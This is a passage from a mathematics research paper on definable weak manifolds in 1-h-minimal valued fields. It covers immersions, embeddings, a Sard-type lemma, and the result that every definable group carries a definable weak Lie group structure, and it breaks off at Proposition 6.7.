\(\varphi_{i}(x)\), so we reduce to the case \(M=V\) is etale over \(K^{n}\). In fact, the result is true whenever \(M\subset K^{m}\) with the subspace topology, as then the local dimension of \(X\subset M\) at a point \(x\) equals the local dimension of \(X\) at \(x\) in \(K^{m}\), and so the result follows from Proposition 2.11(3). If \(G\) is a definable weak topological group and \(H\) is a subgroup, then the local dimension of \(H\) at any point \(h\in H\) is constant independent of \(h\). Indeed the left translation \(L_{h}:G\to G\) is a definable homeomorphism, that sends \(e\) to \(h\) and satisfies \(L_{h}(H)=H\), so \(\dim_{e}(H)=\dim_{h}(H)\). **Proposition 5.9**.: _Suppose \(T\subset K^{m}\) is such that there is a coordinate projection \(\pi:T\to U\) onto an open subset \(U\subset K^{n}\) and such that the fibres of \(\pi\) are finite of constant cardinality, \(s\). Assume the associated map \(f:U\to(K^{m-n})^{[s]}\) is continuous. Then \(T\to K^{n}\) is etale._ Proof.: Let \(x\in T\). Replacing \(U\) by a smaller neighborhood around \(\pi(x)\) we may assume, using Fact 2.13, that \(f\) lifts to a continuous function \(g:U\to(K^{m-n})^{s}\), \(g=(g_{1},\cdots,g_{s})\). 
In this case one gets that \(T\) is homeomorphic to \(\bigsqcup_{i=1}^{s}U\) over \(U\), via the map \((a,i)\mapsto(a,g_{i}(a))\). **Lemma 5.10**.: _Suppose \(M=\bigcup_{i=1}^{r}\varphi_{i}(U_{i})\) where \(\varphi_{i}:U_{i}\to M\) are definable functions, such that the \(U_{i}\) are definable (weak) \(\mathcal{P}\)-\(n\)-manifolds. Suppose further that for all \(i,j\) the sets \(U_{ij}:=\varphi_{i}^{-1}(\varphi_{j}(U_{j}))\) are open in \(U_{i}\), and the transition maps \(U_{ij}\to U_{ji}\) given by \(x\mapsto\varphi_{j}^{-1}\varphi_{i}(x)\) are \(\mathcal{P}\)-maps. Then \(M\) has a unique structure of a definable (weak) \(\mathcal{P}\)-\(n\)-manifold such that \(\varphi_{i}:U_{i}\to M\) is an open immersion._ The proof is straightforward and omitted. **Proposition 5.11**.: _Suppose \(M\) is a definable weak topological manifold. Then \(X\subset M\) is large if and only if the interior of \(X\) in \(M\) is dense in \(M\)._ Proof.: Because the dimension of \(M\setminus X\) is the maximum of the local dimension at its points by Lemma 5.8, we conclude that both conditions are local, and so we may assume \(M=U\subset K^{n}\) is open. Here the result follows from dimension theory. **Proposition 5.12**.: _Suppose \(M\) is a weak definable topological manifold. Suppose \(X\subset M\) is definable. Then \(X\) is a finite union of locally closed definable subsets of \(M\)._ Proof.: There is an immediate reduction to the case where \(M=U\to K^{n}\) is etale. In this case \(U\) has the subspace topology \(U\subset K^{s}\) for some \(s\). So it is enough to prove this for \(X\subset K^{s}\). This is a consequence of Proposition 2.17. In case \(\operatorname{acl}=\operatorname{dcl}\) a weak manifold is generically a manifold: **Proposition 5.13**.: _Suppose \(\operatorname{acl}=\operatorname{dcl}\)._ _If \(M\) is a definable weak \(\mathcal{P}\)-manifold, then there is a definable open dense subset \(U\subset M\) which is a definable \(\mathcal{P}\)-manifold._ Proof.: There is an immediate reduction to the case in which \(i:M=U\to K^{n}\) is etale. Let \(r\) be a uniform bound for the cardinality of the fibers of \(U\). In this case if we denote by \(X_{k}\subset K^{n}\) the set of points \(x\) such that \(i^{-1}(x)\) has cardinality \(k\), and \(U_{k}\subset X_{k}\) is the interior of \(X_{k}\), then \(\bigcup_{k\leq r}U_{k}\) is open and dense in \(K^{n}\). Replacing \(U\) with \(i^{-1}(U_{k})\) we may assume that the nonempty fibers of \(i\) have constant cardinality. From the assumption \(\operatorname{acl}=\operatorname{dcl}\) we conclude that the map \(i(U)\to(K^{r})^{[s]}\) lifts to a definable map \(i(U)\to(K^{r})^{s}\). There is an open dense subset \(V^{\prime}\subset i(U)\) such that \(V^{\prime}\to i(U)\to(K^{r})^{s}\) is a \(\mathcal{P}\)-map, see Lemma 5.6, and we conclude that \(i^{-1}(V^{\prime})\cong\bigsqcup_{i=1}^{s}V^{\prime}\) over \(V^{\prime}\), which is clearly a \(\mathcal{P}\)-manifold. It seems possible that in this situation a weak manifold is already a manifold, but we do not need this so we do not try to prove it. The next couple of results are not used in the main theorems, but may be of independent interest. **Definition 5.14**.: Suppose \(M\) and \(N\) are definable strictly differentiable weak manifolds, and \(f:M\to N\) a definable strictly differentiable function. Then \(f\) is called an immersion if the derivative \(f^{\prime}(x)\) is injective at all points \(x\in M\). \(f\) is called an embedding if \(f\) is an immersion and a homeomorphism onto its image.
\(f\) is called a submersion if the derivative \(f^{\prime}(x)\) is surjective for all \(x\in M\). These notions have the expected properties. **Proposition 5.15**.: _Suppose \(f:M\to N\) is a strictly differentiable definable map of strictly differentiable definable weak manifolds. If \(f\) is an immersion then \(M\) satisfies the following universal property: For every strictly differentiable weak definable manifold \(P\), and \(g:P\to M\), the function \(g\) is strictly differentiable and definable if and only if \(fg\) is strictly differentiable and \(g\) is definable and continuous._ _If \(f\) is an embedding and \(g:P\to M\) is as above, then \(g\) is a strictly differentiable definable map if and only if \(fg\) is a strictly differentiable definable map._ **Proposition 5.16**.: _If \(f:M\to N\) is a surjective submersion, then a map \(g:N\to K\) is a strictly differentiable definable function if and only if the composition \(gf\) is strictly differentiable and definable._ These two properties are a consequence of the theorems on the local structure of immersions and submersions, Propositions 4.9 and 4.10. We leave the details for the interested reader to fill in. Suppose \(M\) is a definable strictly differentiable weak manifold. If \(M\to N\) is a surjective map of sets, it determines at most one structure of a definable strictly differentiable weak manifold on \(N\), in such a way that \(M\to N\) is a submersion. Also, an injective map \(N\to M\) determines at most one structure of a strictly differentiable weak manifold on \(N\), in such a way that \(N\to M\) is an embedding. The subsets \(N\subset M\) admitting such a structure are called submanifolds of \(M\). We also get that if \(N\) is a definable topological space, and \(N\to M\) is a definable and continuous function, then there is at most one structure of a strictly differentiable definable manifold on \(N\) extending the given topology, and for which \(N\to M\) is an immersion. In other words the strictly differentiable weak manifold structure that makes \(N\to M\) an embedding is determined by the set \(N\), and the strictly differentiable weak manifold structure that makes \(N\to M\) an immersion is determined by the topological space \(N\). **Proposition 5.17**.: _Suppose \(M,N\) are definable strictly differentiable weak manifolds, and let \(f:M\to N\) be an injective definable map. Then there is a definable open dense subset \(U\subset M\) such that \(f|_{U}\) is an immersion._ Proof.: By Proposition 5.7 we may assume \(f\) is strictly differentiable. We have to show that the interior of the set \(\{x\in M:f^{\prime}(x)\text{ is injective}\}\) is dense in \(M\). If this is not the case, we can find an open nonempty subset of \(M\) such that \(f\) is not an immersion at any point. So suppose \(M\) is an open subset of \(K^{n}\), \(N\) is an open subset of \(K^{m}\) and \(f\) is not an immersion at any point. For dimension reasons \(n\leq m\). If we define \(X_{k}\) to be the set of points \(x\) of \(M\) such that \(f^{\prime}(x)\) is of rank \(k\) then \(X_{0}\cup\cdots\cup X_{n-1}=M\), and so if \(U_{r}\) is the interior of \(X_{r}\) we have that \(U_{0}\cup\cdots\cup U_{n-1}\) is open dense in \(M\). So we may assume that \(f\) is of constant rank. This contradicts the result in Proposition 4.11, since the map \((x,y)\mapsto(x,0)\) is not injective.
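For instance, the open dense subset in Proposition 5.17 cannot in general be taken to be all of \(M\): over \(\mathbb{Q}_{p}\) with \(p\equiv 2\pmod{3}\), whose theory is \(1\)-h-minimal, the definable map \(f:\mathcal{O}\to\mathcal{O}\) given by \(f(x)=x^{3}\) is injective (as \(1\) is the only cube root of unity in \(\mathbb{Q}_{p}\)) and strictly differentiable, but \(f^{\prime}(0)=0\); so \(f\) is an immersion exactly on the dense open subset \(\mathcal{O}\setminus\{0\}\).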
The following facts are standard, and are probably known: **Fact 5.18**.: _Suppose \(X\) is a Hausdorff space and \(p:X\to Y\) is a surjective continuous map, which is a local homeomorphism with fibers of constant cardinality \(s\). Then the map \(t:Y\to X^{[s]}\), given by the fibers of \(p\), is continuous._ Proof.: Let \(\pi:X^{s}\setminus\Delta\to X^{[s]}\) be the canonical projection. Take \(y\in Y\) and \(\{x_{1},\ldots,x_{s}\}=p^{-1}(y)=t(y)\). A basic open neighborhood of \(t(y)\) is of the form \(\pi(U_{1}\times\cdots\times U_{s})\) for \(x_{k}\in U_{k}\) open and \(U_{k}\) pairwise disjoint. Shrinking \(U_{k}\) we may assume \(p|_{U_{k}}\) is a homeomorphism onto an open set. If \(V=\bigcap_{k}p(U_{k})\), then \(V\) is an open neighborhood of \(y\) and \(t(V)\subset\pi(U_{1}\times\cdots\times U_{s})\). **Fact 5.19**.: _Let \(X,Y,Z\) be topological spaces, \(p:X\to Z\), \(q:Y\to Z\) be surjective continuous functions and \(f:X\to Y\) a continuous bijection such that \(qf=p\). Assume that \(X\) and \(Y\) are Hausdorff spaces, and \(p:X\to Z\) has finite fibers of constant cardinality, \(s\). If the map \(t:Z\to X^{[s]}\), given by \(x\mapsto p^{-1}(x)\) is continuous then \(f\) is a homeomorphism._ Proof.: Since \(f\) is continuous and bijective, we only need to show that it is open, which is a local property. Fix some \(x\in X\) and \(z=p(x)\). By Fact 2.13 the map \(Z\to X^{[s]}\) lifts, locally near \(z\), to a continuous map \((l_{1},\ldots,l_{s}):Z\to X^{s}\). Shrinking \(Z\) to this neighborhood, and reducing \(X\) and \(Y\) accordingly, we may assume that \(X\) is homeomorphic to \(\bigsqcup_{i\leq s}Z\) over \(Z\), via the homeomorphism \(F_{l}:\bigsqcup_{i\leq s}Z\to X\), given by \((i,z)\mapsto l_{i}(z)\). To see that this is a homeomorphism, note that the image of the \(i\)-th-cofactor via \(F_{l}\) is the set \(X_{i}=\{x\in X\mid x=l_{i}p(x)\}\), which is closed in \(X\) (because \(X\) is Hausdorff). Since there are only finitely many \(X_{i}\) (and they are pairwise disjoint) they are also open. Finally, the inverse of \(F_{l}\) restricted to \(X_{i}\) coincides with \(p\), which is continuous. Similarly, we have a homeomorphism \(F_{fl}:\bigsqcup_{i\leq s}Z\to Y\), which is compatible with \(f\) in the sense that \(fF_{l}=F_{fl}\). So \(f=F_{fl}F_{l}^{-1}\) is a homeomorphism over this neighborhood, and in particular \(f\) is open at \(x\). Since \(x\) was arbitrary, the conclusion follows. **Proposition 5.20**.: _Let \(M,N\) be strictly differentiable weak manifolds, and \(f:M\to N\) be an injective definable function. Then there is a dense open \(U\subset M\) such that \(f|_{U}\) is an embedding._ Proof.: By Proposition 5.17 we may assume that \(f\) is an immersion. If \(V_{1},\ldots,V_{n}\) is a finite open cover of \(N\) and the statement is valid for \(f:f^{-1}V_{i}\to V_{i}\), then it is also valid for \(f\). So we may assume \(N=V\to K^{m}\) is etale. From the definition we have that \(V\subset K^{d}\) has the subspace topology. We have already seen that \(f:M\to V\) is an immersion, so if it is a topological embedding into \(K^{d}\), then it is an embedding into \(V\). So we may assume \(N=K^{m}\). Now consider \(U_{1}\cup\cdots\cup U_{n}=M\) a finite open cover of \(M\). Assume \(f|_{U_{i}}\) is an embedding. Define \(U^{\prime}_{i}=\text{Int}(U_{i}\setminus\bigcup_{j<i}U_{j})\), and \(U^{\prime\prime}_{i}=U^{\prime}_{i}\setminus\bigcup_{j\neq i}f^{-1}\operatorname{cl}(f(U^{\prime}_{j}))\). Note that \(\bigcup_{i}U^{\prime}_{i}\subset M\) is an open dense set.
Also, note that \(f(U^{\prime}_{i}\setminus U^{\prime\prime}_{i})=\bigcup_{j\neq i}f(U^{\prime} _{i})\cap\operatorname{cl}(f(U^{\prime}_{j}))\subset\bigcup_{j\neq i} \operatorname{cl}(f(U^{\prime}_{j}))\setminus f(U^{\prime}_{j})\). So we conclude that \(\dim(U^{\prime}_{i}\setminus U^{\prime\prime}_{i})<\dim(M)\), by Proposition 2.18. Thus, replacing \(U_{i}\) with \(U^{\prime\prime}_{i}\) we may assume \(\operatorname{cl}(f(U_{i}))\cap f(U_{j})=\emptyset\) for distinct \(i,j\). In this case one verifies that \(f\) is a topological embedding. We are thus reduced to the case where \(M=U\to K^{n}\) is etale. Consider for each \(I\subset\{1,\ldots,m\}\) of size \(n\), the set \(A_{I}\) of \(x\in U\) such that the \(I\)-th-minor of \(f^{\prime}(x)\) is invertible. As \(U=\bigcup_{I}A_{I}\) we conclude that \(U^{\prime}=\bigcup_{I}\text{Int}(A_{I})\) is open dense in \(U\), so by the reduction in the previous paragraph we may assume that the composition of \(f:U\to K^{m}\) with the projection onto the first \(n\) coordinates \(p:K^{m}\to K^{n}\) is an etale immersion. If \(s\) is a uniform bound for the size of the fibers of \(U\) over \(K^{n}\), then we can take \(A_{k}\) the set of \(x\in K^{m}\) such that the fiber \((pf)^{-1}(x)\) has \(k\) elements, and consider \(U^{\prime}=\bigcup_{k\leq s}\text{Int}(A_{k})\). So we may assume that if \(V=pf(U)\), the fibers of \(U\) over \(V\) have the same size \(s\). In this case the function \(V\to U^{[s]}\), given by \(x\mapsto(pf)^{-1}(x)\), is continuous, and the function \(f\) is topological homeomorphism \(U\to f(U)\), see Facts 5.18 and 5.19. We can now prove a \(1\)-h-minimal version of Sard's Lemma (compare with [16, Theorem 2.7] for an analogous result in the o-minimal setting). Namely, given a definable strictly differentiable morphism, \(f\), of definable weak manifolds, call a value \(x\) of \(f\) regular when \(f\) is a submersion at every point of \(f^{-1}(x)\). The statement is, then, that the set of singular values is small: **Proposition 5.21**.: _Suppose \(M\) and \(N\) are definable strictly differentiable weak manifolds. If \(f:M\to N\) is a strictly differentiable map, then there exists an open dense subset \(U\subset N\) such that \(f:f^{-1}(U)\to U\) is a submersion._ Proof.: We have to see that the image via \(f\) of the set of points \(x\in M\) such that \(f^{\prime}(x)\) is not surjective, is nowhere dense in \(N\). This property is expressible by a first order formula, so we may assume that \(\operatorname{acl}=\operatorname{dcl}\), see Fact 2.5 and the subsequent remark. Let \(m=\dim(N)\). Let \(X\subset M\) a definable set such that for all \(x\in X\), \(f^{\prime}(x)\) is not surjective. We have to see that \(\dim f(X)<m\). We do this by induction on the dimension of \(X\). The base case, when \(X\) is finite, is trivial. The dimension of \(f(X)\) is the maximum of the local dimensions at points, see Proposition 5.8. So we may assume \(N\subset K^{m}\) is open. Covering \(M\) by a finite number of charts we may assume \(M\to K^{n}\) is etale, say \(M\subset K^{r}\). Then by Proposition 2.15 there exists a finite partition of \(X\) into definable sets such that if \(X^{\prime}\) is an element of the partition, there exists a coordinate projection \(p:K^{r}\to K^{l}\), which restricted to \(X^{\prime}\) is a surjection \(X^{\prime}\to U\) onto an open subset \(U\subset K^{l}\) with finite fibers of constant cardinality. 
If we prove that \(\dim f(X^{\prime})<m\) for every element \(X^{\prime}\) of the partition then also \(\dim f(X)<m\). So we may assume there is a coordinate projection \(p:X\to U\) onto an open subset \(U\subset K^{l}\), such that \(p^{-1}(u)\) has \(t\) elements for all \(u\in U\). From the assumption \(\operatorname{acl}=\operatorname{dcl}\), we get that there are definable sections \(s_{1},\dots,s_{t}:U\to X\), such that \(\{s_{1}(u),\cdots,s_{t}(u)\}=p^{-1}(u)\), for all \(u\in U\). As \(X=\bigcup_{i\leq t}s_{i}(U)\), we may assume \(p:X\to U\) is a bijection with inverse \(s:U\to X\). The map \(s:U\to M\) becomes strictly differentiable in an open dense \(V\subset U\), see Proposition 5.7. As \(s(U\setminus V)\) has smaller dimension than \(X\), we may assume that \(s\) is strictly differentiable. Now note that \(s\) has image in \(X\) and so the composition \(U\to M\to N\) has derivative which is not surjective at any point of \(U\). So we have reduced to the case in which \(M=U\subset K^{n}\) is open and \(X=U\). If we consider \(A_{k}\subset U\), the set defined by \(A_{k}=\{x\in U:f^{\prime}(x)\text{ has rank }k\}\), then \(\bigcup_{k<m}A_{k}=U\) and so \(\bigcup_{k<m}\text{Int}(A_{k})\) is open and dense in \(U\). We conclude by the induction hypothesis that the image of \(U\setminus\bigcup_{k<m}\text{Int}(A_{k})\) is nowhere dense in \(N\), and so we may assume that \(f^{\prime}(x)\) has constant rank \(k\) in \(U\), for a \(k<m\). Consider the set \(Y=\{x\in U:\dim f^{-1}f(x)\geq\dim(U)-k\}\). Then \(Y\) is definable, because dimension is definable in definable families. Also, \(Y\) has dense interior by the constant rank theorem Proposition 4.11. So once more by the induction hypothesis we may assume \(f^{-1}f(x)\) has dimension at least \(\dim(U)-k\) for all \(x\in U\). Then the dimension of \(f(U)\) is at most \(k\), by the additivity of dimension. If \(M\to N\) is a map of strictly differentiable weak manifolds, and \(y\in N\) is a regular value, then one can show \(f^{-1}(y)\subset M\) is a strictly differentiable weak submanifold. ## 6. Definable Lie groups In this section we show that every definable group is a definable weak Lie group and that the germ of a definable weak Lie group morphism is determined by its derivative at the identity. The proof of the following lemma was communicated to us by Martin Hils. **Lemma 6.1**.: _Suppose \(G\) is a group \(a\)-definable in a pregeometric theory, and that \(X,Y\subset G\) are non-empty \(a\)-definable sets of dimension smaller than \(G\). If \(g\in G\) is such that \(\dim(gX\cap Y)=\dim(X)\), then \(\dim(g/a)\leq\dim(Y)\)._ _In particular, there exists \(g\in G\) such that \(\dim(gX\cap Y)<\dim(X)\)_ Proof.: Denote \(d=\dim(X)\) and \(d^{\prime}=\dim(Y)\). Suppose \(\dim(gX\cap Y)=d\). Note that \(d\leq d^{\prime}\). Let \(h^{\prime}\in gX\cap Y\) be such that \(\dim(h^{\prime}/ag)=d\). Let \(h=g^{-1}h^{\prime}\). As \(h\in X\) we have \(d\geq\dim(h/a)\geq\dim(h/ag)=\dim(h^{\prime}/ag)=d\). The first inequality is because \(h\in X\), the third one because \(h\) and \(h^{\prime}\) are inter-definable over \(ag\), and the fourth one by choice of \(h^{\prime}\). We conclude that \(h\) and \(g\) are algebraically independent over \(a\). Then we obtain that \(d^{\prime}\geq\dim(h^{\prime}/a)\geq\dim(h^{\prime}/ah)=\dim(g/ah)=\dim(g/a)\). 
The first inequality because \(h^{\prime}\in Y\), the third equality because \(h^{\prime}\) and \(g\) are inter-definable over \(ah\), and the fourth equality because \(h\) and \(g\) are algebraically independent over \(a\). For the second statement, note that if \(g\in G\) is such that \(\dim(g/a)=\dim(G)\), or more generally \(\dim(g/a)>d^{\prime}\), then \(\dim(gX\cap Y)<\dim(Y)\). The next lemma generalizes Lemma 2.4 of [11] for o-minimal theories. Pillay's proof can be seen to generalize, with some effort, to geometric theories. We give a different proof: **Lemma 6.2**.: _Suppose, \(G\) is a group definable in a pregeometric theory and suppose \(X\subset G\) is such that \(\dim(G\setminus X)<\dim(G)\). Then a finite number of translates of \(X\) cover \(G\)._ Proof.: Suppose we have \(g_{0},\cdots,g_{n}\in G\) such that \(\dim(G\setminus(\bigcup_{k}g_{k}X))=m\). By the Lemma 6.1 applied to \(G\setminus X\) and \(G\setminus(\bigcup_{k}g_{k}X)\) we get that there is \(g_{n+1}\in G\) such that \(\dim(G\setminus\bigcup_{k\leq(n+1)}g_{k}X)<m\), which finishes the proof. **Lemma 6.3**.: _Suppose \(G\) is a definable group in a pregeometric theory and \(V\subset G\) is large. Then every \(g\in G\) is a product of two elements in \(V\)._ Proof.: The proof of [11, Lemma 2.1] works: if we take \(h\in G\) generic over \(g\), then \(h^{-1}g\) is also generic over \(g\), and so \(h,h^{-1}g\in V\) and their product is \(g\). **Proposition 6.4**.: _A definable group can be given the structure of a definable strictly differentiable weak \(T_{k}\)-Lie group. The forgetful functor from definable strictly differentiable weak Lie groups to definable groups is an equivalence of categories._ _If \(\operatorname{acl}=\operatorname{dcl}\) the forgetful functor from definable strictly differentiable \(T_{k}\)-Lie groups to definable groups is an equivalence of categories._ Proof.: That the forgetful functor is full follows from Proposition 5.7. Indeed, suppose \(G\) and \(H\) are strictly differentiable or \(T_{k}\)-Lie groups, and let \(f:G\to H\) be a definable group morphism. Then by Proposition 5.7 there is an open dense \(U\subset G\) such that \(f:U\to H\) is strictly differentiable or \(T_{k}\). If \(g_{0}\in U\) is arbitrary, and \(g\in G\), consider the formula \(f=L_{f(g)f(g_{0})^{-1}}fL_{g_{0}g^{-1}}\), where we are denoting \(L_{h}\) the left translate by \(h\). Now, \(L_{g_{0}g^{-1}}\) is a strict diffeomorphism or \(T_{k}\)-isomorphism which sends \(g\) to \(g_{0}\), and \(L_{f(g)f(g_{0})^{-1}}\) is a strict diffeomorphism or \(T_{k}\)-isomorphism. We conclude that \(f\) being strictly differentiable or \(T_{k}\) at \(g_{0}\) implies that \(f\) is strictly differentiable of \(T_{k}\) at \(g\). To see that the forgetful functor is essentially surjective one follows the proof of [11, Proposition 2.5]. Namely, let \(G\) be of dimension \(n\). Decompose \(G\) as in Proposition 2.15, and let \(V_{0}\subset G\) be the union of the \(n\)-dimensional pieces \(U_{0},\cdots,U_{r}\). Give \(V_{0}\) the structure of a weak strictly differentiable manifold with charts the inclusions \(U_{i}\to V_{0}\), see Proposition 5.9. Note that \(V_{0}^{-1}\subset G\) is large in \(G\), as the inverse function is a definable bijection sending the large subset \(V_{0}\) onto \(V_{0}^{-1}\). As the intersection of two large sets is large, we conclude that \(V_{0}\cap V_{0}^{-1}\) is large in \(G\). 
A fortiori, \(V_{0}\cap V_{0}^{-1}\) is large in \(V_{0}\) and so it contains an open dense subset of \(V_{0}\), see Proposition 5.11. Let \(V_{1}\subset V_{0}\cap V_{0}^{-1}\) be open dense in \(V_{0}\) such that the inverse function on \(V_{1}\) (and into \(V_{0}\)) is strictly differentiable and \(T_{k}\), see Proposition 5.7. In a similar way, we have that \(V_{0}\times V_{0}\cap m^{-1}(V_{0})\) is large in \(G\times G\) Indeed, \(m^{-1}(V_{0})\) is the inverse image of the large subset \(G\times V_{0}\) of \(G\times G\) under the definable bijection \((\operatorname{Id},m):G\times G\to G\times G\). In the same way as before, we find \(Y_{0}\subset V_{0}\times V_{0}\cap m^{-1}(V_{0})\) open and dense in \(V_{0}\times V_{0}\) such that the multiplication map \(Y_{0}\to V_{0}\) is strictly differentiable and \(T_{k}\). Now we take \[V_{1}^{\prime}=\{g\in V_{1}:(h,g),(h^{-1},hg)\in Y_{0}\text{ for all }h\text{ generic over }g\}.\] Note that \(V_{1}^{\prime}\) is definable, because \(g\in V_{1}^{\prime}\) is equivalent to \(\dim(G\setminus X_{g})<n\) for \(X_{g}=\{h\in G:(h,g),(h^{-1},hg)\in Y_{0}\}\), and dimension is definable in definable families in geometric theories. Note also that \(V_{1}^{\prime}\) is large in \(G\), because if \(g\in G\) is generic and \(h\in G\) is generic over \(g\), then \((h,g)\) is generic in \(G\times G\), and \((h^{-1},hg)\), being the image of a definable bijection at \((h,g)\) is also generic in \(G\times G\), so they belong to \(Y_{0}\), because \(Y_{0}\) is large in \(G\times G\). Now take \(V_{2}\) the interior of \(V_{1}^{\prime}\) in \(V_{0}\) and \(V=V_{2}\cap V_{2}^{-1}\). Then \(V_{2}\) is large in \(V_{0}\) by Proposition 5.11, and so it is also large in \(G\). So we conclude that \(V\) is an open dense subset of \(V_{0}\). Define also \(Y=\{(g,h):g,h,gh\in V,(g,h)\in Y_{0}\}\), then \(Y\) is open dense in \(V_{0}\times V_{0}\). This is because \(Y\) is large in \(G\times G\), with arguments as above, and it is open in \(Y_{0}\), because multiplication is continuous in \(Y_{0}\). Then we have shown: 1. \(V\) is large in \(G\). 2. \(Y\) is dense open subset of \(V\times V\), and multiplication \(Y\to V\) is strictly differentiable and \(T_{k}\). 3. Inversion is a strictly differentiable \(T_{k}\)-map from \(V\) onto \(V\). 4. If \(g\in V\) and \(h\in G\) is generic in \(G\) over \(g\) then \((h,g),(h^{-1},hg)\in Y\) For the last item, note that \(h,hg,h^{-1}\in G\) are generic, and so they belong to \(V\). Also, because \(g\in V_{1}^{\prime}\), one has that \((h,g),(h^{-1},hg)\in Y_{0}\). From this one gets 1. For every \(g,h\in G\) the set \(Z=\{x\in V:gxh\in V\}\) is open and \(Z\to V\) given by \(x\mapsto gxh\) is strictly differentiable and \(T_{k}\). 2. For every \(g,h\in G\), the set \(W=\{(x,y)\in V\times V:gxhy\in V\}\) is open in \(V\times V\) and the map \(W\to V\) given by \((x,y)\mapsto gxhy\) is strictly differentiable and \(T_{k}\). Indeed, for (a), assume \(x_{0}\in Z\), take \(h_{1}\) generic over \(h\) and \(k\) generic over \(g,x,h,h_{1}\). Take \(h_{2}=h_{1}^{-1}h\). Note that \(h_{1},h_{2}\in V\). Now one writes \(f(x)=gxh\) as a composition of strictly differentiable and \(T_{k}\) functions defined on an open neighborhood of \(x_{0}\) in the following way. 
Consider the set \(Z_{1}=\{x\in V:(kg,x)\in Y,(kgx,h_{1})\in Y,(kgxh_{1},h_{2})\in Y,(k^{-1},kgxh) \in Y\}\), then by item 2 we have that \(Z_{1}\) is open and the map \(x\mapsto gxh=k^{-1}(((kgx)h_{1})h_{2})\) is a composition of strictly differentiable and \(T_{k}\) functions. Also \(x_{0}\in Z_{1}\) by item 4. Similarly for (b) given \((x_{0},y_{0})\in W\) the set \[W_{1}=\{(x,y)\in V:(kg,x),(kgx,h_{1}),(kgxh_{1},h_{2}),(kgxh,y),(k^{-1},kgxhy) \in Y\}\] is open by item (3), contains \((x_{0},y_{0})\) by item (4) and in \(W_{1}\) the required map is a composition of strictly differentiable and \(T_{k}\) functions. By (1) above and Lemma 6.2 a finite number of translates, \(g_{0}V,\ldots,g_{n}V\), cover \(G\). Consider the maps \(\varphi_{i}:V\to G\) given by \(\varphi_{i}(x)=g_{i}x\). It is straightforward to verify, using (a), (b) and (3) above that these charts endow \(G\) with a (unique) structure of a strictly differentiable or \(T_{k}\) manifold, as in Lemma 5.10, and with this structure \(G\) is a Lie group. For example, to see that the transition maps are strictly differentiable or \(T_{k}\), we have to see that the sets \(V\cap g_{i}^{-1}g_{j}V\) are open, and the maps \(\varphi_{i,j}:V\cap g_{i}^{-1}g_{j}V\to V\cap g_{j}^{-1}g_{i}V\) given by \(x\mapsto g_{j}^{-1}g_{i}x\) are strictly differentiable or \(T_{k}\). This is a particular case of (a). Similarly, (b) translates into the multiplication being strictly differentiable or \(T_{k}\) and (a) and (3) translate into the inversion being strictly differentiable and \(T_{k}\). When \(\operatorname{acl}=\operatorname{dcl}\) an appropriate version of cell decomposition in Proposition 2.15 gives the result by repeating the above proof. Alternatively, we can see it directly from the result we have just proved and Proposition 5.13 and Lemma 6.2 (and the appropriate version of the Lemma 5.10). Indeed, if \(G\) is a definable group in a 1-h-minimal field with \(\operatorname{acl}=\operatorname{dcl}\), then \(G\) has the structure of a weak strictly differentiable or \(T_{k}\)-Lie group. By Proposition 5.13 there is an open dense \(U\subset G\) such that \(U\) is a strictly differentiable or \(T_{k}\)-manifold. By Proposition 5.11 and Lemma 6.2 a finite number of translates of \(U\) cover \(G\), \(g_{1}U\cup\cdots\cup g_{n}U=G\). Then the functions \(\varphi_{i}:U\to G\) given by \(x\mapsto g_{i}x\) form a gluing data for \(G\) which makes it a strictly differentiable or \(T_{k}\)-Lie group. As the previous result implies that every definable group \(G\) admits a structure of a definable weak Lie group which is unique up to a unique isomorphism, whenever we mention a property of the weak Lie group structure we understand it with respect to this structure. **Definition 6.5**.: A definable strictly differentiable local Lie group is given by a definable open set containing a distinguished point \(e\in U\subset K^{n}\), a definable open subset \(e\in U_{1}\subset U\), and definable strictly differentiable maps \(U_{1}\times U_{1}\to U\) denoted as \((a,b)\mapsto a\cdot b\) and \(U_{1}\to U\) denoted as \(a\mapsto a^{-1}\), such that there exists \(e\in U_{2}\subset U_{1}\) definable open such that * \(a\cdot e=e\cdot a=a\) for \(a\in U_{2}\). * If \(a,b,c\in U_{2}\) then \(a\cdot b\in U_{1},b\cdot c\in U_{1}\) and \((a\cdot b)\cdot c=a\cdot(b\cdot c)\). * If \(a\in U_{2}\) then \(a^{-1}\in U_{1}\) and \(a\cdot a^{-1}=a^{-1}\cdot a=e\). 
Given two definable strictly differentiable local Lie groups, \(U\) and \(V\), a definable strictly differentiable local Lie group morphism is given by a definable strictly differentiable map \(f:U^{\prime}\to V_{1}\) for some definable open set \(U^{\prime}\subset U_{1}\) containing \(e\), with \(U_{1}\) and \(V_{1}\) as in the above definition, and such that \(f(e)=e\), \(f(a\cdot b)=f(a)\cdot f(b)\) and \(f(a^{-1})=f(a)^{-1}\) for \(a,b\in U^{\prime}\). Also two such maps \(f_{1}\) and \(f_{2}\) are identified as morphisms if they have the same germ around \(0\), in other words, if there is a definable open neighborhood of the identity \(W\subset\operatorname{dom}(f_{1})\cap\operatorname{dom}(f_{2})\) such that \(f_{1}|_{W}=f_{2}|_{W}\). It is common to only consider local groups where \(e=0\), and translating we see that every local group is isomorphic to one with this condition. In this case we denote the distinguished element by \(e\) whenever we emphasize its role as a local group identity. We will usually identify a local group with its germ at \(e\). In those terms, the prototypical example of a local Lie group is the germ around the identity of a Lie group. The following fact is a well-known application of the chain rule. We give the short proof for completeness: **Fact 6.6**.: _Suppose \(U\) is a local definable strictly differentiable Lie group. Then the multiplication map \(m:U_{1}\times U_{1}\to U_{0}\) has derivative \(m^{\prime}(0)(u,v)=u+v\). The inverse \(i:U_{1}\to U_{0}\) has derivative \(i^{\prime}(0)(x)=-x\). The \(n\)-power \(p_{n}:U_{n}\to U_{0}\) has derivative \(p_{n}^{\prime}(0)(x)=nx\)._ Proof.: The formula for \(m^{\prime}(0)\) follows formally from the equations \(m(x,0)=x,m(0,y)=y\). Indeed, if \(m(x,y)=ax+by+o(x,y)\), then plugging \(y=0\) we obtain \(a=1\) and plugging \(x=0\) we obtain \(b=1\). Here we are using the small \(o\) notation, \(f=o(x,y)\), meaning that for all \(\epsilon>0\) there is an \(r\) such that if \(|(x,y)|<r\) then \(|f(x,y)|\leq\epsilon|(x,y)|\), and we are using the uniqueness of derivatives for the strictly differentiable functions \(m(x,0)\) and \(m(0,y)\). From this the formula for \(i^{\prime}(0)\) follows from \(m(x,i(x))=0\) and the chain rule. The formula for \(p_{n}\) follows inductively from the chain rule and \(p_{n}(x)=m(p_{n-1}(x),x)\). We give some results on subgroups and quotient groups. These are not needed for the main applications. **Proposition 6.7**.: _Suppose \(f:G\to H\) is a 